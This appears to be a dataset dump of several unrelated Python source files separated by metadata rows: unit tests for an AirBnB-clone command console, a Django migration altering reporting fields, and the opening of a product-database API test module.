eval_results["mahalanobis_distance_marginal"] = md_marginal.tolist()
log.info("**************Done.**********************")
return eval_results
| 38.62753
| 116
| 0.6013
| 1,105
| 9,541
| 4.847059
| 0.099548
| 0.050411
| 0.033981
| 0.029873
| 0.862957
| 0.862957
| 0.860717
| 0.847648
| 0.847648
| 0.840179
| 0
| 0.000887
| 0.291374
| 9,541
| 247
| 117
| 38.62753
| 0.791303
| 0
| 0
| 0.774725
| 0
| 0
| 0.089185
| 0.038566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098901
| false
| 0
| 0.043956
| 0.027473
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8774ec73da9b87613faccad02ae7a7d5544e1c1
| 32,676
|
py
|
Python
|
tests/test_console.py
|
adrienmillot/AirBnB_clone
|
757bdea6064f8c8a1d0fad3e8ad30d9b08b3f75a
|
[
"Unlicense"
] | null | null | null |
tests/test_console.py
|
adrienmillot/AirBnB_clone
|
757bdea6064f8c8a1d0fad3e8ad30d9b08b3f75a
|
[
"Unlicense"
] | 1
|
2021-07-01T11:29:07.000Z
|
2021-07-01T11:29:07.000Z
|
tests/test_console.py
|
adrienmillot/AirBnB_clone
|
757bdea6064f8c8a1d0fad3e8ad30d9b08b3f75a
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/python3
from os import system
from models.engine.file_storage import FileStorage
import unittest
from io import StringIO
from unittest.mock import patch
from console import HBNBCommand
from models import storage
import os
class ConsolePromptingTest(unittest.TestCase):
def testPrompt(self):
"""
Prompt command
"""
self.assertEqual(HBNBCommand().prompt,
"(hbnb) ")
def testEmptyLine(self):
"""
Empty line
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("")
self.assertEqual(output.getvalue().strip(), "")
class ConsoleHelpTest(unittest.TestCase):
def testHelpCreate(self):
"""
create() method have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help create")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(), "Creates a new instance of BaseModel, \
saves it (to the JSON file) and prints the id.\n\n")
def testHelpAll(self):
"""
all() method have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help all")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(), "Prints all string representation of \
all instances based or not on the class name.\n\n")
def testHelpDestroy(self):
"""
destroy() method have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help destroy")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(), "Deletes an instance based on the \
class name and id (save the change into the JSON file).\n\n")
def testHelpUpdate(self):
"""
update() method have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help update")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(), "Updates an instance based on the \
class name and id by adding or updating attribute (save the \
change into the JSON file).\n\n")
def testHelpShow(self):
"""
show() method have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help show")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(), "Prints the string representation of \
an instance based on the class name and id.\n\n")
def testHelpQuit(self):
"""
quit have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help quit")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(),
"Quit command to exit the program\n\n")
def testHelpEOF(self):
"""
EOF command have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help EOF")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(),
"EOF command to exit the program\n\n")
def testHelpCount(self):
"""
count() method have help documented
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("help count")
self.assertGreater(len(output.getvalue()), 0)
self.assertEqual(output.getvalue(), "Update your command interpreter \
(console.py) to retrieve the number of instances of a class.\
\n\n")
class ConsoleExitTest(unittest.TestCase):
def testDoQuit(self):
"""
Quit
"""
with self.assertRaises(SystemExit):
HBNBCommand().onecmd("quit")
def testDoEOF(self):
"""
EOF
"""
with self.assertRaises(SystemExit):
HBNBCommand().onecmd("EOF")
class ConsoleAllTest(unittest.TestCase):
@classmethod
def setUp(self):
try:
os.rename("file.json", "tmp")
except IOError:
pass
FileStorage.__objects = {}
@classmethod
def tearDown(self):
try:
os.remove("file.json")
except IOError:
pass
try:
os.rename("tmp", "file.json")
except IOError:
pass
def testAllInvalidClass(self):
"""
all invalid class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("all toto")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("toto.all()")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
def testAllMissingClass(self):
"""
all() missing class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd(".all()")
self.assertEqual(output.getvalue(), "** class name missing **\n")
def testAllInstanceSpaceNotation(self):
"""
all instance command
"""
self.__allInstanceSpaceNotation("Amenity", "User")
self.__allInstanceSpaceNotation("BaseModel", "User")
self.__allInstanceSpaceNotation("City", "User")
self.__allInstanceSpaceNotation("Place", "User")
self.__allInstanceSpaceNotation("Review", "User")
self.__allInstanceSpaceNotation("State", "User")
self.__allInstanceSpaceNotation("User", "BaseModel")
def testAllInstanceDotNotation(self):
"""
all() instance command
"""
self.__allInstanceDotNotation("Amenity", "User")
self.__allInstanceDotNotation("BaseModel", "User")
self.__allInstanceDotNotation("City", "User")
self.__allInstanceDotNotation("Place", "User")
self.__allInstanceDotNotation("Review", "User")
self.__allInstanceDotNotation("State", "User")
self.__allInstanceDotNotation("User", "BaseModel")
def __allInstanceSpaceNotation(self, prmClassName, prmOtherClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue()
with patch("sys.stdout", new=StringIO()) as output:
command = "all {}".format(prmClassName)
self.assertFalse(HBNBCommand().onecmd(command))
self.assertIn(prmClassName, output.getvalue().strip())
self.assertNotIn(prmOtherClassName, output.getvalue().strip())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __allInstanceDotNotation(self, prmClassName, prmOtherClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue()
with patch("sys.stdout", new=StringIO()) as output:
command = "{}.all()".format(prmClassName)
self.assertFalse(HBNBCommand().onecmd(command))
self.assertIn(prmClassName, output.getvalue().strip())
self.assertNotIn(prmOtherClassName, output.getvalue().strip())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
class ConsoleCountTest(unittest.TestCase):
__classes = [
'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
]
@classmethod
def setUp(self):
try:
os.rename("file.json", "tmp")
except IOError:
pass
FileStorage.__objects = {}
@classmethod
def tearDown(self):
try:
os.remove("file.json")
except IOError:
pass
try:
os.rename("tmp", "file.json")
except IOError:
pass
def testCountMissingClass(self):
"""
count() missing class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("count")
self.assertEqual(output.getvalue(), "** class name missing **\n")
def testCountInvalidClass(self):
"""
count() invalid class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("count toto")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
def testCountInstanceSpaceNotation(self):
"""
count instance command.
"""
for className in self.__classes:
self.__testCountSpaceNotation(className)
def testCountInstanceDotNotation(self):
"""
count() instance command.
"""
for className in self.__classes:
self.__testCountDotNotation(className)
def __testCountSpaceNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"count {}".format(prmClassName)))
count = int(output.getvalue())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue()
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"count {}".format(prmClassName)))
self.assertEqual(output.getvalue().strip(), str(count + 1))
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __testCountDotNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.count()".format(prmClassName)))
count = int(output.getvalue())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue()
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.count()".format(prmClassName)))
self.assertEqual(output.getvalue().strip(), str(count + 1))
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
class ConsoleCreateTest(unittest.TestCase):
__classes = [
'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
]
@classmethod
def setUp(self):
try:
os.rename("file.json", "tmp")
except IOError:
pass
FileStorage.__objects = {}
@classmethod
def tearDown(self):
try:
os.remove("file.json")
except IOError:
pass
try:
os.rename("tmp", "file.json")
except IOError:
pass
def testCreateMissingClass(self):
"""
create() missing class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("create")
self.assertEqual(output.getvalue(), "** class name missing **\n")
def testInvalidClass(self):
"""
create() invalid class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("create toto")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
def testCreateInstance(self):
"""
create() Amenity
"""
for prmClassName in self.__classes:
self.__testCreateObject(prmClassName)
def __testCreateObject(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
key = "{}.{}".format(prmClassName, id)
self.assertIn(key, storage.all().keys())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
class ConsoleDestroyTest(unittest.TestCase):
__classes = [
'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
]
@classmethod
def setUp(self):
try:
os.rename("file.json", "tmp")
except IOError:
pass
FileStorage.__objects = {}
@classmethod
def tearDown(self):
try:
os.remove("file.json")
except IOError:
pass
try:
os.rename("tmp", "file.json")
except IOError:
pass
def testDestroyMissingClass(self):
"""
destroy() missing class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("destroy")
self.assertEqual(output.getvalue(), "** class name missing **\n")
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd(".destroy()")
self.assertEqual(output.getvalue(), "** class name missing **\n")
def testDestroyInvalidClass(self):
"""
destroy() invalid class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("destroy toto")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("toto.destroy()")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
def testDestroyMissingIdSpaceNotation(self):
"""
destroy missing id command
"""
for className in self.__classes:
self.__missingIdSpaceNotation(className)
def testDestroyMissingIdDotNotation(self):
"""
destroy() missing id command
"""
for className in self.__classes:
self.__missingIdDotNotation(className)
def testDestroyNoInstanceFoundSpaceNotation(self):
"""
destroy no instance command
"""
for className in self.__classes:
self.__noInstanceFoundSpaceNotation(className)
def testDestroyNoInstanceFoundDotNotation(self):
"""
destroy() no instance command
"""
for className in self.__classes:
self.__noInstanceFoundDotNotation(className)
def testDestroyInstanceSpaceNotation(self):
"""
destroy instance command
"""
for className in self.__classes:
self.__destroyInstanceSpaceNotation(className)
def testDestroyInstanceDotNotation(self):
"""
destroy() instance command
"""
for className in self.__classes:
self.__destroyInstanceDotNotation(className)
def __missingIdSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"destroy {}".format(prmClassName)))
self.assertEqual("** instance id missing **",
output.getvalue().strip())
def __missingIdDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy()".format(prmClassName)))
self.assertEqual("** instance id missing **",
output.getvalue().strip())
def __noInstanceFoundSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"destroy {} 1".format(prmClassName)))
self.assertEqual("** no instance found **",
output.getvalue().strip())
def __noInstanceFoundDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy(1)".format(prmClassName)))
self.assertEqual("** no instance found **",
output.getvalue().strip())
def __destroyInstanceSpaceNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
command = "destroy {} {}".format(prmClassName, id)
self.assertFalse(HBNBCommand().onecmd(command))
self.assertNotIn(obj, storage.all())
def __destroyInstanceDotNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
command = "{}.destroy({})".format(prmClassName, id)
self.assertFalse(HBNBCommand().onecmd(command))
self.assertNotIn(obj, storage.all())
def __getObj(self, prmClassName: str, prmUuid: str):
return storage.all()["{}.{}".format(prmClassName, prmUuid)]
class ConsoleShowTest(unittest.TestCase):
__classes = [
'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
]
@classmethod
def setUp(self):
try:
os.rename("file.json", "tmp")
except IOError:
pass
FileStorage.__objects = {}
@classmethod
def tearDown(self):
try:
os.remove("file.json")
except IOError:
pass
try:
os.rename("tmp", "file.json")
except IOError:
pass
def testShowMissingClass(self):
"""
show() missing class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("show")
self.assertEqual(output.getvalue(), "** class name missing **\n")
def testInvalidClass(self):
"""
show() invalid class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("show toto")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("toto.show()")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
def testMissingIdSpaceNotation(self):
"""
show missing id command
"""
for className in self.__classes:
self.__missingIdSpaceNotation(className)
def testMissingIdDotNotation(self):
"""
show() missing id command
"""
for className in self.__classes:
self.__missingIdDotNotation(className)
def testNoInstanceFoundSpaceNotation(self):
"""
show no instance command
"""
for className in self.__classes:
self.__noInstanceFoundSpaceNotation(className)
def testNoInstanceFoundDotNotation(self):
"""
show() no instance command
"""
for className in self.__classes:
self.__noInstanceFoundDotNotation(className)
def testShowInstanceSpaceNotation(self):
"""
show instance command
"""
for className in self.__classes:
self.__showInstanceSpaceNotation(className)
def testShowInstanceDotNotation(self):
"""
show() instance command
"""
for className in self.__classes:
self.__showInstanceDotNotation(className)
def __missingIdSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"show {}".format(prmClassName)))
self.assertEqual("** instance id missing **",
output.getvalue().strip())
def __missingIdDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.show()".format(prmClassName)))
self.assertEqual("** instance id missing **",
output.getvalue().strip())
def __noInstanceFoundSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"show {} 1".format(prmClassName)))
self.assertEqual("** no instance found **",
output.getvalue().strip())
def __noInstanceFoundDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.show(1)".format(prmClassName)))
self.assertEqual("** no instance found **",
output.getvalue().strip())
def __showInstanceSpaceNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
command = "show {} {}".format(prmClassName, id)
self.assertFalse(HBNBCommand().onecmd(command))
self.assertEqual(obj.__str__(), output.getvalue().strip())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __showInstanceDotNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
command = "{}.show({})".format(prmClassName, id)
self.assertFalse(HBNBCommand().onecmd(command))
self.assertEqual(obj.__str__(), output.getvalue().strip())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"destroy {} {}".format(prmClassName, id)))
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __getObj(self, prmClassName: str, prmUuid: str):
return storage.all()["{}.{}".format(prmClassName, prmUuid)]
class ConsoleUpdateTest(unittest.TestCase):
__classes = [
'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
]
@classmethod
def setUp(self):
try:
os.rename("file.json", "tmp")
except IOError:
pass
FileStorage.__objects = {}
@classmethod
def tearDown(self):
try:
os.remove("file.json")
except IOError:
pass
try:
os.rename("tmp", "file.json")
except IOError:
pass
def testShowMissingClass(self):
"""
update() missing class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("update")
self.assertEqual(output.getvalue(), "** class name missing **\n")
def testInvalidClass(self):
"""
update() invalid class
"""
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("update toto")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
with patch('sys.stdout', new=StringIO()) as output:
HBNBCommand().onecmd("toto.update()")
self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
def testMissingIdSpaceNotation(self):
"""
update missing id command
"""
for className in self.__classes:
self.__missingIdSpaceNotation(className)
def testMissingIdDotNotation(self):
"""
update() missing id command
"""
for className in self.__classes:
self.__missingIdDotNotation(className)
def testNoInstanceFoundSpaceNotation(self):
"""
update no instance command
"""
for className in self.__classes:
self.__noInstanceFoundSpaceNotation(className)
def testNoInstanceFoundDotNotation(self):
"""
update() no instance command
"""
for className in self.__classes:
self.__noInstanceFoundDotNotation(className)
def testMissingAttributeSpaceNotation(self):
"""
update() no instance command
"""
for className in self.__classes:
self.__missingAttributeSpaceNotation(className)
def testMissingAttributeDotNotation(self):
"""
update() no instance command
"""
for className in self.__classes:
self.__missingAttributeDotNotation(className)
def testUpdateInstanceSpaceNotation(self):
"""
update no instance command
"""
for className in self.__classes:
self.__updateInstanceSpaceNotation(className)
def testUpdateInstanceDotNotation(self):
"""
update() no instance command
"""
for className in self.__classes:
self.__updateInstanceDotNotation(className)
self.__updateInstanceWithJSONDotNotation(className)
def __missingIdSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"update {}".format(prmClassName)))
self.assertEqual("** instance id missing **",
output.getvalue().strip())
def __missingIdDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.update()".format(prmClassName)))
self.assertEqual("** instance id missing **",
output.getvalue().strip())
def __noInstanceFoundSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"update {} 1".format(prmClassName)))
self.assertEqual("** no instance found **",
output.getvalue().strip())
def __noInstanceFoundDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.update(1)".format(prmClassName)))
self.assertEqual("** no instance found **",
output.getvalue().strip())
def __missingAttributeSpaceNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
obj = self.__getObj(prmClassName, id)
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"update {} {}".format(prmClassName, id)))
self.assertEqual("** attribute name missing **",
output.getvalue().strip())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __missingAttributeDotNotation(self, prmClassName: str):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
obj = self.__getObj(prmClassName, id)
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.update(\"{}\")".format(prmClassName, id)))
self.assertEqual("** attribute name missing **",
output.getvalue().strip())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __updateInstanceSpaceNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
self.assertNotIn("first_name", obj.__dict__.keys())
command = "update {} {} {} {}".format(
prmClassName, id, "first_name", "john")
self.assertFalse(HBNBCommand().onecmd(command))
self.assertEqual(obj.first_name, "john")
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __updateInstanceDotNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
self.assertNotIn("first_name", obj.__dict__.keys())
command = "{}.update(\"{}\", \"{}\", \"{}\")".format(
prmClassName, id, "first_name", "john")
self.assertFalse(HBNBCommand().onecmd(command))
obj = self.__getObj(prmClassName, id)
self.assertIn("first_name", obj.__dict__.keys())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __updateInstanceWithJSONDotNotation(self, prmClassName):
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"create {}".format(prmClassName)))
id = output.getvalue().strip()
with patch("sys.stdout", new=StringIO()) as output:
obj = self.__getObj(prmClassName, id)
self.assertNotIn("first_name", obj.__dict__.keys())
jsonData = "{'first_name': 'john'}"
command = "{}.update(\"{}\", {})".format(
prmClassName, id, jsonData)
self.assertFalse(HBNBCommand().onecmd(command))
obj = self.__getObj(prmClassName, id)
self.assertIn("first_name", obj.__dict__.keys())
with patch("sys.stdout", new=StringIO()) as output:
self.assertFalse(HBNBCommand().onecmd(
"{}.destroy({})".format(prmClassName, id)))
def __getObj(self, prmClassName: str, prmUuid: str):
return storage.all()["{}.{}".format(prmClassName, prmUuid)]
| 37.344
| 87
| 0.575897
| 2,935
| 32,676
| 6.322317
| 0.071891
| 0.075124
| 0.051735
| 0.077603
| 0.824908
| 0.818495
| 0.812352
| 0.812352
| 0.808364
| 0.797424
| 0
| 0.000732
| 0.289662
| 32,676
| 874
| 88
| 37.386728
| 0.798716
| 0.037979
| 0
| 0.71637
| 0
| 0
| 0.105809
| 0
| 0
| 0
| 0
| 0
| 0.197731
| 1
| 0.145867
| false
| 0.029173
| 0.012966
| 0.004862
| 0.186386
| 0.001621
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8a07a91a62ea805fcd842b06bbfc0b66c527af4
| 2,058
|
py
|
Python
|
usaspending_api/reporting/migrations/0006_auto_20210423_1715.py
|
ststuck/usaspending-api
|
b13bd5bcba0369ff8512f61a34745626c3969391
|
[
"CC0-1.0"
] | 217
|
2016-11-03T17:09:53.000Z
|
2022-03-10T04:17:54.000Z
|
usaspending_api/reporting/migrations/0006_auto_20210423_1715.py
|
Hk92a/usaspending-api
|
25daa9dbc30835b8f4b4c797c592ba9ecc78ca00
|
[
"CC0-1.0"
] | 622
|
2016-09-02T19:18:23.000Z
|
2022-03-29T17:11:01.000Z
|
usaspending_api/reporting/migrations/0006_auto_20210423_1715.py
|
Hk92a/usaspending-api
|
25daa9dbc30835b8f4b4c797c592ba9ecc78ca00
|
[
"CC0-1.0"
] | 93
|
2016-09-07T20:28:57.000Z
|
2022-02-25T00:25:27.000Z
|
# Generated by Django 2.2.18 on 2021-04-23 17:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('reporting', '0005_auto_20210202_2235'),
]
operations = [
migrations.AlterField(
model_name='reportingagencyoverview',
name='linked_assistance_awards',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='linked_procurement_awards',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='total_budgetary_resources',
field=models.DecimalField(decimal_places=2, max_digits=23, null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='total_diff_approp_ocpa_obligated_amounts',
field=models.DecimalField(decimal_places=2, max_digits=23, null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='total_dollars_obligated_gtas',
field=models.DecimalField(decimal_places=2, max_digits=23, null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='unlinked_assistance_c_awards',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='unlinked_assistance_d_awards',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='unlinked_procurement_c_awards',
field=models.IntegerField(null=True),
),
migrations.AlterField(
model_name='reportingagencyoverview',
name='unlinked_procurement_d_awards',
field=models.IntegerField(null=True),
),
]
| 34.881356
| 82
| 0.624393
| 181
| 2,058
| 6.856354
| 0.303867
| 0.145044
| 0.181305
| 0.210314
| 0.804996
| 0.804996
| 0.804996
| 0.718775
| 0.718775
| 0.714746
| 0
| 0.027609
| 0.278426
| 2,058
| 58
| 83
| 35.482759
| 0.808081
| 0.022352
| 0
| 0.692308
| 1
| 0
| 0.246269
| 0.241791
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019231
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d8ddcb47d320e4af2507c3590177f331e78e3547
| 101,921
|
py
|
Python
|
app/productdb/tests/test_productdb_api_views.py
|
gaetoleole/product-database
|
191b304600d6f069d57ab3d0c28886e7e6545231
|
[
"MIT"
] | null | null | null |
app/productdb/tests/test_productdb_api_views.py
|
gaetoleole/product-database
|
191b304600d6f069d57ab3d0c28886e7e6545231
|
[
"MIT"
] | null | null | null |
app/productdb/tests/test_productdb_api_views.py
|
gaetoleole/product-database
|
191b304600d6f069d57ab3d0c28886e7e6545231
|
[
"MIT"
] | null | null | null |
"""
Test suite for the productdb.api_views module
"""
import pytest
from urllib.parse import quote
import requests
from django.utils.dateformat import DateFormat
from django.utils.formats import get_format
from django.conf import settings
from django.contrib.auth.models import User, Permission
from django.core.urlresolvers import reverse
from django.utils.datetime_safe import date, datetime
from mixer.backend.django import mixer
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.test import APIClient
from app.config.models import NotificationMessage
from app.productdb.models import Vendor, ProductGroup, Product, ProductList, ProductMigrationOption, \
ProductMigrationSource
pytestmark = pytest.mark.django_db
AUTH_USER = {
"username": "api",
"password": "api"
}
SUPER_USER = {
"username": "pdb_admin",
"password": "pdb_admin"
}
REST_TOKEN_AUTH = reverse("productdb:api-token-auth")
REST_VENDOR_LIST = reverse("productdb:vendors-list")
REST_VENDOR_DETAIL = REST_VENDOR_LIST + "%d/"
REST_PRODUCT_GROUP_LIST = reverse("productdb:productgroups-list")
REST_PRODUCT_GROUP_COUNT = REST_PRODUCT_GROUP_LIST + "count/"
REST_PRODUCT_GROUP_DETAIL = REST_PRODUCT_GROUP_LIST + "%d/"
